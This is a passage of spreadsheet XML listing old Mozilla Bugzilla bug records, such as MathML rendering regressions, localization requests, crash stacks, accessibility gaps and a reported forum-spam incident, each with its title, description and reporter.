methods we want to _export_ (most of these are already annotated with NS_EXPORT
for win32).
Options 2 and 3 obviously don't buy us anything immediately and depend on
getting a gcc patch done and checked in and probably waiting for the next gcc
release that contains it.  They do however make the Mozilla code less messy. 
#2 isn't really that hard (I even have a rough patch although visibility is a
bit hosed in general on the gcc trunk).  #3 requires a lot more thought and we
could have a difficult time getting concensus on that (you have to come up with
a mechanism to know that all of your symbols from DSOs that you link with will
not be hidden).</t>
  </si>
  <si>
    <t>CORE-228804</t>
  </si>
  <si>
    <t>MathML</t>
  </si>
  <si>
    <t>mathml rendering is worse on MacOS X after adding Mathematica fonts in 1.3b and later</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.3b) Gecko/20030212
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.3b) Gecko/20030212
See screenshot at:
http://web.mit.edu/jamous/www/mathml/mozilla1.3b.gif
on MathML torture test (see URL above) tests 5 8 13 16 18 19 21 and 22
are broken.
This problem has happened in all the Mozilla versions since 1.3 beta.
Reproducible: Always
Steps to Reproduce:
1. get Mozilla version 1.3 beta or any version later
2. go to the MathML torture test at:
http://www.mozilla.org/projects/mathml/demo/texvsmml.xhtml
Actual Results:  
screenshot at:
http://web.mit.edu/jamous/www/mathml/mozilla1.3b.gif
Expected Results:  
give a MathML rendering at least as good as the ones obtained with versions 1.3a
and earlier -- see following screenshot with Mozilla 1.3a:
http://web.mit.edu/jamous/www/mathml/mozilla1.3a.gif
This bug showed up between versions
1.3 alpha and 1.3 beta.</t>
  </si>
  <si>
    <t>rbs</t>
  </si>
  <si>
    <t>jamous</t>
  </si>
  <si>
    <t>MOZILLA.ORG-356724</t>
  </si>
  <si>
    <t>Discussion Forums</t>
  </si>
  <si>
    <t>mozilla.dev.l10n.sk newsgroup</t>
  </si>
  <si>
    <t>The Slovak localization team would like to have a newsgroup at
news.mozilla.org.
This group would be used for better communication between all the members of
the team and all the various Mozilla-related Slovak l10n projects i.e. it
would be similar to the Czech newsgroup mozilla.dev.l10n.cs and Polish newsgroup mozilla.dev.l10n.pl
The newsgroup's name should be mozilla.dev.l10n.sk.</t>
  </si>
  <si>
    <t>rozbora</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-196301</t>
  </si>
  <si>
    <t>nl / Dutch</t>
  </si>
  <si>
    <t>Sommige onderdelen moeten nog vertaald worden.</t>
  </si>
  <si>
    <t>H luitjes
Zodat ik het niet vergeet laat het je echter niet tegenhouden er zelf aan te
beginnen :). Houd me in dat geval ff op de hoogte ...
Mazzel
Martijn.</t>
  </si>
  <si>
    <t>Martijn.Ras</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-362459</t>
  </si>
  <si>
    <t>zh-CN / Chinese (Simplified)</t>
  </si>
  <si>
    <t>Translation errors found in the miscellaneous files in zh firefox2.0.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040113
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040113
There are translation errors found in the miscellaneous files in zh firefox2.0 including inaccuracy typo not good expression etc.
Reproducible: Always</t>
  </si>
  <si>
    <t>shaohua.wen</t>
  </si>
  <si>
    <t>serena.xiao</t>
  </si>
  <si>
    <t>SEAMONKEY-514630</t>
  </si>
  <si>
    <t>cannot bookmark pages using drag&amp;drop</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.1.4pre) Gecko/20090903 SeaMonkey/2.0b2pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.1.4pre) Gecko/20090903 SeaMonkey/2.0b2pre
In nightly 20090831 it worked in 20090903 it doesn't anymore.
Reproducible: Always
Steps to Reproduce:
1. Load a page.
2. Drag its icon in the address bar into the personal toolbar or the bookmark manager window.
Actual Results:  
During drag I get an insertion cursor but after drop nothing happens.
Expected Results:  
Bookmark for site should get inserted into bookmark list.</t>
  </si>
  <si>
    <t>robome</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-527009</t>
  </si>
  <si>
    <t>RelOps: General</t>
  </si>
  <si>
    <t>Reclone talos-rev2-vista06 and qm-pvista-try10</t>
  </si>
  <si>
    <t>It looks like talos-rev2-vista06 has been misbehaving.  Can we please reimage this machine?</t>
  </si>
  <si>
    <t>jhford</t>
  </si>
  <si>
    <t>CORE-508247</t>
  </si>
  <si>
    <t>Crash [@ _moz_cairo_matrix_multiply] with getCTM method on path inside definition-src</t>
  </si>
  <si>
    <t>Created attachment 392477
testcase
See testcase which crashes current trunk build.
This regressed between 2009-07-22 and 2009-07-24:
http://hg.mozilla.org/mozilla-central/pushloghtml?startdate=2009-07-22+04%3A00%3A00&amp;enddate=2009-07-24+06%3A00%3A00
I guess a regression from bug 435356.
http://crash-stats.mozilla.com/report/index/c7aff124-3e64-42fd-902b-318792090804?p=1
0  	xul.dll  	_moz_cairo_matrix_multiply  	 gfx/cairo/cairo/src/cairo-matrix.c:298
1 	xul.dll 	gfxMatrix::Multiply 	gfx/thebes/src/gfxMatrix.cpp:82
2 	xul.dll 	xul.dll@0x9aeb17 	
3 	xul.dll 	nsSVGGraphicElement::GetCTM 	content/svg/content/src/nsSVGGraphicElement.cpp:109
4 	xul.dll 	NS_InvokeByIndex_P 	xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:101
5 	xul.dll 	XPCWrappedNative::CallMethod 	js/src/xpconnect/src/xpcwrappednative.cpp:2710</t>
  </si>
  <si>
    <t>longsonr</t>
  </si>
  <si>
    <t>martijn.martijn</t>
  </si>
  <si>
    <t>SEAMONKEY-141029</t>
  </si>
  <si>
    <t>Need to update editorTasksOverlay due to menu changes</t>
  </si>
  <si>
    <t>Recent changes to menus effected commercial tree in that aim no longer 
is overlaid in the correct place. This bug just add an ID to the insertAfter 
element so that if AIM is present composer and addressbook appear in 
the correct location.</t>
  </si>
  <si>
    <t>andreww</t>
  </si>
  <si>
    <t>FIREFOX-304804</t>
  </si>
  <si>
    <t>Disability Access</t>
  </si>
  <si>
    <t>Menu is not accessible</t>
  </si>
  <si>
    <t>Using GOK-&gt;Menu no keyboard for menus can be displayed. The whole menu bar is
not accessible. This is critical bugs for firefox a11y on Unix platform.</t>
  </si>
  <si>
    <t>Louie.Zhao</t>
  </si>
  <si>
    <t>BUGZILLA-342053</t>
  </si>
  <si>
    <t>Quicksearch.pm defines $cgi outside routines</t>
  </si>
  <si>
    <t>Quicksearch.pm defines my $cgi = Bugzilla-&gt;cgi outside routines. This makes perl -cwT buglist.cgi to fail because buglist.cgi uses Quicksearch.pm. I saw this problem a few seconds before committing my patch about the removal of versioncache. )
We have to fix this before committing my patch about versioncache.</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-412183</t>
  </si>
  <si>
    <t>Sisyphus</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD</t>
  </si>
  <si>
    <t>Sisyphus|JavaScript Testing - TinderboxPrint of test counts contain leading whitespace</t>
  </si>
  <si>
    <t>Created attachment 296837
patch
mozilla/js/tests/runtests.sh uses wc to count the number of tests failures fixes and regressions for output to Tinderbox. On mac wc -l returns leading whitespace which causes unintended line breaks on the Tinderbox page.</t>
  </si>
  <si>
    <t>SEAMONKEY-322240</t>
  </si>
  <si>
    <t>Various pref panel items missing accesskeys.</t>
  </si>
  <si>
    <t>Various pref panel items missing accesskeys that I didn't find a specific Component for:
  Appearance/
    Themes/
      Theme to use-box.
      Get New Themes-link.
    Language and Content Packs/
      Installed language packs:-box.
      Installed content packs:-box.
  Nagivator/
    Display on-combobox.
    Languages/
      Languages in order of preference:-box.
    Helper Applications/
      File types:-box.
      When encountered:-textbox.
      PFS checkbox.
    Smart Browsing/
      Domain guessing checkbox.
      Advanced.../
        Entire dialog.
  Roaming User/
    Server Information dropdown.</t>
  </si>
  <si>
    <t>wladow</t>
  </si>
  <si>
    <t>vhaarr+bmo</t>
  </si>
  <si>
    <t>SEAMONKEY-361128</t>
  </si>
  <si>
    <t>Help Documentation</t>
  </si>
  <si>
    <t>Bad description of Privacy tab in page_info_help.xhtml</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.1) Gecko/20061101 SeaMonkey/1.1b Mnenhy/0.7.4.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8.1) Gecko/20061101 SeaMonkey/1.1b Mnenhy/0.7.4.0
page_info_help.xhtml
In added section about Privacy tab in SeaMonkey version 1.1 are two simple bugs proposed change (check my bad English):
-  Page Components: Under the page URL there are many
-    categories. To see the list of items in any category click on the name:
+  Page Components: Under the page URL there are many
+    categories. To see the list of items in any category double click on
+    the name:
-Note: The sites with a published privacy policy are not
-  very common so you will usually not see this tab while inspecting pages on
-  the Web.
+Note: The sites with a published privacy policy are not
+  very common so if you press one of these buttons you will usually see only
+  message saying that  is unable to display selected item 
+  because site does not have published this.
Reproducible: Always
Expected Results:  
Bugs fixed.</t>
  </si>
  <si>
    <t>lemiel</t>
  </si>
  <si>
    <t>WEBSITES-530185</t>
  </si>
  <si>
    <t>planet.mozilla.org</t>
  </si>
  <si>
    <t>WEBSITES</t>
  </si>
  <si>
    <t>add harthur's feed to planet</t>
  </si>
  <si>
    <t>I'd like to do a blog post on a script I wrote and possibly stuff in the future and I would like this feed to be added to planet: http://harthur.wordpress.com/category/mozilla/feed/rss/</t>
  </si>
  <si>
    <t>fayearthur</t>
  </si>
  <si>
    <t>CORE-513451</t>
  </si>
  <si>
    <t>nsPresShell::EnumeratePlugins unused</t>
  </si>
  <si>
    <t>bug 480819 removed the caller of EnumeratePlugins but not the function itself.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-164741</t>
  </si>
  <si>
    <t>Quitting quickly after starting up can crash in favicon code</t>
  </si>
  <si>
    <t>If you quit quickly before Chimera has had a chance to load all the favicons
you can crash as necko callbacks try to mess with deleted UI elements.</t>
  </si>
  <si>
    <t>SOCORRO-518144</t>
  </si>
  <si>
    <t>SOCORRO</t>
  </si>
  <si>
    <t>Socorro UI: empty signatures in the UI still need a link to the underlying data</t>
  </si>
  <si>
    <t>Sometimes a crash signature cannot be generated from a crash.  The processor when encountering this provides an explanation in the 'processor_notes' field.  Sometimes crashes without signature appear in searches and reports.  In the UI the signature is often the base text for the link that allows the user to drill down to get more information.  If the signature is blank the link is omitted even though there is associated data.  The user has no way to get to the crashes with no signature.
Action: in locations where there are normally signatures as links put no signature found as the text of the link in the case where the signature is blank.
This change affects the results of a search as well as the top_crashes_by_signature reports.</t>
  </si>
  <si>
    <t>ozten.bugs</t>
  </si>
  <si>
    <t>CORE-406079</t>
  </si>
  <si>
    <t>JavaScript Engine</t>
  </si>
  <si>
    <t>--enable-dtrace broken</t>
  </si>
  <si>
    <t>Created attachment 290765
JSFunction-&gt;clasp fixes.  Use -p1 to apply.
My build dies with:
mozilla/js/src/jsdtracef.c:202: error: 'struct JSFunction' has no member named 'clasp'
This is because this commit:
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;root=/cvsroot&amp;subdir=/mozilla/js/src&amp;command=DIFF_FRAMESET&amp;file=jsfun.h&amp;rev2=3.49&amp;rev1=3.48
Moved clasp but jsdtracef.c hasn't changed to use -&gt;u.n.clasp.
Attached a patch I'm building with now still untested (my build got past /js but hasn't finished yet).</t>
  </si>
  <si>
    <t>MOZILLA.ORG-354776</t>
  </si>
  <si>
    <t>CVS: Copy</t>
  </si>
  <si>
    <t>cvs copies for creation of standalone module for www.bugzilla.org</t>
  </si>
  <si>
    <t>The 'bugzilla-org' module already exists on cvs-www with a stubbed in copy of the site build system we use for the rest of the major websites.  We now need the files from the old bugzilla.org website module at mozilla-org/html/projects/bugzilla moved into the new module.</t>
  </si>
  <si>
    <t>TOOLKIT-310843</t>
  </si>
  <si>
    <t>Add-ons Manager</t>
  </si>
  <si>
    <t>EM requires the use of integer data for em:type</t>
  </si>
  <si>
    <t>This may be as trivial as the incorrect em:type being written to the extensions
datasource and I don't know what the worst case is... what ever the case the
current docs for everything except multiple item packages do not state that
em:type must be integer data. One example is language packs (see the patch in
bug 307225) - in this case they will have the em:type for an extension when the
following function is used.
http://lxr.mozilla.org/seamonkey/source/toolkit/mozapps/extensions/src/nsExtensionManager.js.in#634</t>
  </si>
  <si>
    <t>THUNDERBIRD-405160</t>
  </si>
  <si>
    <t>thunderbird view-source window lacks status bar (port bug 401947)</t>
  </si>
  <si>
    <t>Created attachment 289969
proposed fix
Thunderbird's view-source should also show the status bar (which has nice line numbers and such). Was fixed for seamonkey in bug 401947 - https://bugzilla.mozilla.org/attachment.cgi?id=286885&amp;action=diff
Fixing the terrible indenting while I'm at it (cvsblame is quite useless for the affected code anyways). 
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/mail/base/content/mailCommands.js&amp;rev=1.36#518</t>
  </si>
  <si>
    <t>mkmelin+mozilla</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-619146</t>
  </si>
  <si>
    <t>NetOps</t>
  </si>
  <si>
    <t>please open mysql port for bm-graphs-stage01 -&gt; tm-stage01-master01</t>
  </si>
  <si>
    <t>Jabba set us up a new staging server (bm-graphs-stage01) over in bug 619083.
We need to be able to connect to mysql (3306) on tm-stage01-master01</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-262846</t>
  </si>
  <si>
    <t>Chinese-Traditional</t>
  </si>
  <si>
    <t>sina.com.cn - SHTML served as text/plain</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 rv:1.7.3) Gecko/20040913 Firefox/0.10.1
it can't display shtml webpage well.it just show me the page source file.
Reproducible: Always
Steps to Reproduce:
1.go to a website that has shtml webpage
2.click a link to a shtml webpage
3.it happened.
Actual Results:  
it display page source 
Expected Results:  
display the webpage just like it dispaly a normal html webpage.</t>
  </si>
  <si>
    <t>chinese-traditional</t>
  </si>
  <si>
    <t>talinya</t>
  </si>
  <si>
    <t>THUNDERBIRD-377906</t>
  </si>
  <si>
    <t>Bump Thunderbird version to 15012pre</t>
  </si>
  <si>
    <t>Created attachment 261978
App and nagios changes to use 1.5.0.12pre
I forgot to keep the Thunderbird version in sync with Firefox on the 1.8.0 branch let's fix ahead of the next round of security releases.</t>
  </si>
  <si>
    <t>nthomas</t>
  </si>
  <si>
    <t>SEAMONKEY-236010</t>
  </si>
  <si>
    <t>INI parser reads memory beyond EOF</t>
  </si>
  <si>
    <t>valgrind spews a lot of these:
 strchr (mac_replace_strmem.c:113)
 nsINIParser::FindKey(char* char* char* int*) (nsINIParser.cpp:245)
 nsINIParser::GetString(char* char* char* int*) (nsINIParser.cpp:108)
 nsINIParser::GetStringAlloc(char* char* char** int*) (nsINIParser.cpp:122)
Address 0x58EE18A is 0 bytes after a block of size 3238 alloc'd
 malloc (vg_replace_malloc.c:160)
 nsINIParser::nsINIParser(char*) (nsINIParser.cpp:59)
 nsXIContext::LoadResources() (nsXIContext.cpp:137)
 nsXInstaller::ParseConfig() (nsXInstaller.cpp:95)
the file is read into a buffer just big enough for its contents.  There is no
room for NULL termination.</t>
  </si>
  <si>
    <t>ajschult784</t>
  </si>
  <si>
    <t>TOOLKIT-434805</t>
  </si>
  <si>
    <t>Safe Browsing</t>
  </si>
  <si>
    <t>work harder to recover from url-classifier db corruption</t>
  </si>
  <si>
    <t>Created attachment 321795
v1
The url-classifier relies on synchronous=OFF to get decent update performance on its large transactions.  This opens up the possibility of db corruption in the case of a badly-timed power failure.  There's no user data lost we just need to rebuild the db from the server.
Right now we only reset the db if the corruption is detected when the database is open which isn't always the case.  Attached patch will recover from corruption detected during the update or lookup process.
As it stands right now if corruption is detected during the update/lookup processes the update/lookup will fail silently and it won't fix itself.</t>
  </si>
  <si>
    <t>PENELOPE_GRAVEYARD-395922</t>
  </si>
  <si>
    <t>Compose Window</t>
  </si>
  <si>
    <t>PENELOPE_GRAVEYARD</t>
  </si>
  <si>
    <t>default font not maintained on text indentation</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Build Identifier: 8.0.0b1
I select a default font of fixed width from tools&gt;options&gt;composition&gt;html&gt;font.  When typing in a message the font is fixed width.  However when I indent text with increase indent the default font changes to variable width.  It should remain as fixed width.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>mdudziak</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-494612</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING</t>
  </si>
  <si>
    <t>Set up mozilla messaging email account for James Burke</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.0.10) Gecko/2009042315 Firefox/3.0.10
Build Identifier: 
Tracking bug requested by Gozer for MoMo email setup for James Burke.
Reproducible: Always</t>
  </si>
  <si>
    <t>jrburke</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-350096</t>
  </si>
  <si>
    <t>Update Mozilla and Seamonkey Valid App Versions</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1b2) Gecko/20060824 BonEcho/2.0b2
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.1b2) Gecko/20060824 BonEcho/2.0b2
An author reported to me he got the following error when uploading his or her extension:
&gt; Error! The MaxAppVer for Mozilla of 1.7.12 in install.rdf is invalid.
&gt; Error! The MaxAppVer for SeaMonkey of 1.0.3 in install.rdf is invalid.
If not done already these versions should be added as well as the latest release builds (Mozilla 1.7.13 and Seamonkey 1.0.4)
Reproducible: Didn't try</t>
  </si>
  <si>
    <t>cameron</t>
  </si>
  <si>
    <t>osaier</t>
  </si>
  <si>
    <t>FIREFOX-352216</t>
  </si>
  <si>
    <t>Three problems with new small back/forward icons</t>
  </si>
  <si>
    <t>The new versions of the small back/forward nav icons have three problems.
(1) The tips of the arrows are drawn at an angle that's JUST different than 45 degrees.  This causes some odd antialiasing: at normal size the arrow tips appear to change angle halfway through and the points are a bit thick.  Because there's so little room to define these shapes I'd suggest making the small icons use 45 degree angles for the tips and leave the large icons as-is.
(2) The backs of the arrow stems look chopped off at normal size.  On the large icons these backs have a light column of pixels inside a dark edge that's just a bit lighter than the top/bottom edges.  On the small icons the effect is subtle the light column (especially on the current right arrow) is almost impossible to see as different and the dark column appears noticeably lighter than the top/bottom edges.  Because of this the arrows don't look closed.  I suggest changing the small icons to make the back column of pixels be as dark as the top/bottom rows to make the edge more defined.  Perhaps the light column inside the dark edge could be lightened as well but I'm not as sure on that one.
(3) The small icons appear to be reversed.  Note the position of the spherical reflections inside compared with the large icons.
Image to follow demonstrating these issues.</t>
  </si>
  <si>
    <t>WEBSITES-444826</t>
  </si>
  <si>
    <t>mozillalabs.com</t>
  </si>
  <si>
    <t>spam found on labs forum</t>
  </si>
  <si>
    <t>reported to webmaster@mozilla.com.   we should get this cleaned off and figure out captcha or bot protection mechanism.   maybe something along the lines that morgamic is thinking about for addons.mozilla.org
You have a spam profile on your forum at
https://labs.mozilla.com/forum/index.php?action=profileu=4105
We are receiving form spam (see below) linking to this page.
-----Original Message-----
From: Website [mailto:safetyp1@box230.bluehost.com] 
Sent: Thursday July 10 2008 6:29 PM
To: info@safetypartnersinc.com
Subject: Information Request
The following information request has been submitted from the website.
	From:	  Mr. Devidr Devidr
		  	Hello
		  	Home
	Address:  devid574@gmail.com
		  	devid574@gmail.com
		  	mexico NY	 856414
	Phone:	  13 255 645 135
	Fax:	  13 255 645 135
	E-mail:	  devid574@gmail.com
	INQUIRY:
	Hi! Nice place. My sites:
fake coach purses
discount kitchen cabinets
http://fakecoachpurses.blogs.experienceproject.com/49186.html
https://labs.mozilla.com/forum/index.php?action=profileu=4105
[url=http://fakecoachpurses.blogs.experienceproject.com/49186.html]fake
coach purses[/url]
[url=https://labs.mozilla.com/forum/index.php?action=profileu=4105]discount
kitchen cabinets[/url]
	==================== END ====================</t>
  </si>
  <si>
    <t>chofmann</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-316393</t>
  </si>
  <si>
    <t>german community page needs update</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20051114 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20051114 Firefox/1.6a1
Change a the line German to German
Reproducible: Always</t>
  </si>
  <si>
    <t>thorsten.fritz</t>
  </si>
  <si>
    <t>CORE-502168</t>
  </si>
  <si>
    <t>Duplicated content with  inside table markup</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 da rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 da rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
When you log on to any Fronter installation (used by 4 mio. users in EU) the images in the top navigation appears multiple times after upgrading to Firefox 3.5
This bug was not present in 3.11 or 3.10
Reproducible: Always
Steps to Reproduce:
1. log in to Fronter using the link below:
USERNAME: egh110787MELN
PASSWORD: egh110787MELN
2. Take a look at the images in the top navigation bar
FAST LOGON:
https://fronter.com/DK-test/index.phtml?username=egh110787MELN&amp;password=egh110787MELN&amp;newlang=de&amp;saveid=-1&amp;mainurl=main.phtml&amp;chp=&amp;USER_SCREEN_SIZE=
Actual Results:  
Images are displayed multiple times hiding links behind. Making nativation impossible.
Expected Results:  
The images should be shown only once.
Take a look at the screenshot here:
http://frontersupport.dk/ERRORS/firefox_bug.jpg</t>
  </si>
  <si>
    <t>DATA_&amp;_BI_SERVICES_TEAM-882361</t>
  </si>
  <si>
    <t>DB: MySQL</t>
  </si>
  <si>
    <t>DATA_&amp;_BI_SERVICES_TEAM</t>
  </si>
  <si>
    <t>Add socorro3.db.phx1 to ganglia monitoring</t>
  </si>
  <si>
    <t>the data_source definition for Socorro Postgres contains tp-socorro01-master01.phx1 and tp-socorro01-master02 and needs the tertiary master socorro3.db.phx1 added in puppet</t>
  </si>
  <si>
    <t>mpressman</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD-511289</t>
  </si>
  <si>
    <t>SKYWRITER_GRAVEYARD</t>
  </si>
  <si>
    <t>When MobWrite is restarted data is lost</t>
  </si>
  <si>
    <t>Dion and I were collaborating on a document when it appears Kevin's daemon auto-restarted the deadlocked mobwrite.
i immediately lost the contents of the files I was collaborating on with dion. i had saved frequently so i could retrieve the contents by turning collaboration off and then reloading the file and then copying this to the clipboard turning collaboration on (which caused the contents to disappear) and then pasting it in.
this should be fixed such that restarting mobwrite causes no loss of data for the user.</t>
  </si>
  <si>
    <t>CORE-265300</t>
  </si>
  <si>
    <t>Check for subject in email form submission should be case-insensitive</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20041001 Firefox/0.10.1
In IE one can have the form send e-mail with a specific subject line such as
[ISUS Web] Dealer Inquiry.  However with Firefox the subject is replaced
with Form Post From Mozilla.
Sample code used to designate e-mail address and subject are:
&lt;form method=POST enctype=text/plain
action=mailto:Info@InventorySystemsUS.com
Webmaster@On-SiteComputer.com?Subject=[ISUS Web] Dealer Inquiry&gt;
form body . . .
Reproducible: Always
Steps to Reproduce:
1. Noted in detail and in sample web page referenced above.
2.
3.
Actual Results:  
Noted in detail above.
Expected Results:  
Perform as IE does in this instance.
For severity I selected Minor however there does not seem to be an easy work
around.
Thanks
TomRScott@On-SiteComputer.com</t>
  </si>
  <si>
    <t>TomRScott</t>
  </si>
  <si>
    <t>THUNDERBIRD-451599</t>
  </si>
  <si>
    <t>Add preferences UI for disk cache size and clearing the cache</t>
  </si>
  <si>
    <t>Bug 450456 added support for disk cache.
We want to also add support for allowing the user to change the size and clear the cache from the preferences UI.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-432918</t>
  </si>
  <si>
    <t>A patchset after some testing of the nightly pre rc1 Firefox3 mk builds</t>
  </si>
  <si>
    <t>This patch is correcting some very minor errors in the macedonian localisation of the pre rc1 nightly builds. the corrections are some accesskeys and some words.
 browser/chrome/browser/browser.dtd                                         |    4 ++--
 browser/chrome/browser/safebrowsing/blockedSite.properties                 |    2 +-
 browser/chrome/browser/safebrowsing/phishing-afterload-warning-message.dtd |    2 +-
 browser/chrome/browser/search.properties                                   |    2 +-
 calendar/chrome/prototypes/sun-calendar-event-dialog.dtd                   |    4 ++--
 calendar/sunbird-l10n.js                                                   |    2 +-
 dom/chrome/netError.dtd                                                    |    2 +-
 security/manager/chrome/pipnss/pipnss.properties                           |    2 +-
 toolkit/chrome/mozapps/extensions/extensions.properties                    |    4 ++--
 9 files changed 12 insertions(+) 12 deletions(-)</t>
  </si>
  <si>
    <t>gdamjan</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-135209</t>
  </si>
  <si>
    <t>Chinese-Simplified</t>
  </si>
  <si>
    <t>Display blank area in home.sina.com</t>
  </si>
  <si>
    <t>Build: 04-02 trunk and N6.2.2 builds / Mac 10.1.3
There is a blank area after I finished load page http://home.sina.com (sina USA).
Resize the browser window to very small can resolve the problem however the
scroll bar will be covered by some text strings.
Don't see it on Mac 9.1 Windows and linux.</t>
  </si>
  <si>
    <t>amyy</t>
  </si>
  <si>
    <t>CORE-496032</t>
  </si>
  <si>
    <t>inline-block s don't support first-letter/first-line</t>
  </si>
  <si>
    <t>... due to ConstructButton calling IsBlockOutside instead of IsBlockInside. Patch forthcoming.</t>
  </si>
  <si>
    <t>THUNDERBIRD-470112</t>
  </si>
  <si>
    <t>Preference mail.toolbars.showbutton.junk doesn't work in Thunderbird - remove old prefs from about:config</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Build Identifier: version 2.0.0.18 (20081119)
Setting mail.toolbars.showbutton.junk to false doesn't hide the button. This should hide the button and toolbar preferences should be stored in prefs.js. They do not seem to be.
Reproducible: Always
Steps to Reproduce:
1. Set user_pref(mail.toolbars.showbutton.junk false) either in prefs.js or through the config dialog
2. Junk is still showing
Expected Results:  
Junk Button should be hidden.</t>
  </si>
  <si>
    <t>CORE-187503</t>
  </si>
  <si>
    <t>Web Painting</t>
  </si>
  <si>
    <t>Overflown content is rendered with black background</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030102
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030102
When scrolling into not visible content on an element that has overflow:auto
shows the content with a black blackground color.
This bug might be the same as closed bug 172227 but that one has been fixed so
I was suggested to open a new one.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>BUGZILLA-159629</t>
  </si>
  <si>
    <t>Query/Bug List</t>
  </si>
  <si>
    <t>quips.cgi should require a login to access.</t>
  </si>
  <si>
    <t>Spun off from 159627 - there seems no real need for anonymous quip contribution.
Gerv</t>
  </si>
  <si>
    <t>gerv</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-467207</t>
  </si>
  <si>
    <t>Remove MOZILLA_1_8_BRANCH ifdefs from Camino code</t>
  </si>
  <si>
    <t>Now that the 1_8 branch is about to EOL we really don't need the #if(n)defs on cvs trunk any more.
(I'm not sure of our spacing rules or I'd do this myself.)</t>
  </si>
  <si>
    <t>alqahira</t>
  </si>
  <si>
    <t>MOZILLA.ORG-409955</t>
  </si>
  <si>
    <t xml:space="preserve">l10n CVS Account Request - Joshy K Jacob </t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Build Identifier: 
Request for CVS access
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>joshyk</t>
  </si>
  <si>
    <t>TOOLKIT-506696</t>
  </si>
  <si>
    <t>Application Update</t>
  </si>
  <si>
    <t>[WinCE] updater.exe doesn't use the working directory when applying the update</t>
  </si>
  <si>
    <t>There are also a few return codes that aren't correct for the functions they emulate in updater_wince.cpp</t>
  </si>
  <si>
    <t>CORE-227547</t>
  </si>
  <si>
    <t>Internationalization</t>
  </si>
  <si>
    <t>[PATCH] need NFD  NFC conversion into and out of Mac OS X file system (Unicode normalization)</t>
  </si>
  <si>
    <t>See screenshot.  This problem is still present in Thunderbird 0.4rc2.  In hangul
(Korean) syllables are blocks of 2 or 3 characters stacked together.  In the
screenshot you'll see that the characters aren't stacked together just
displayed side by side.  On my desktop you'll see the same filename probably
displayed.  
Basically attachment file names are unreadable in Korean.</t>
  </si>
  <si>
    <t>jshin1987</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-294036</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/products/products/firefox/releases/1.0.4.html</t>
  </si>
  <si>
    <t>Filing broken link as requested</t>
  </si>
  <si>
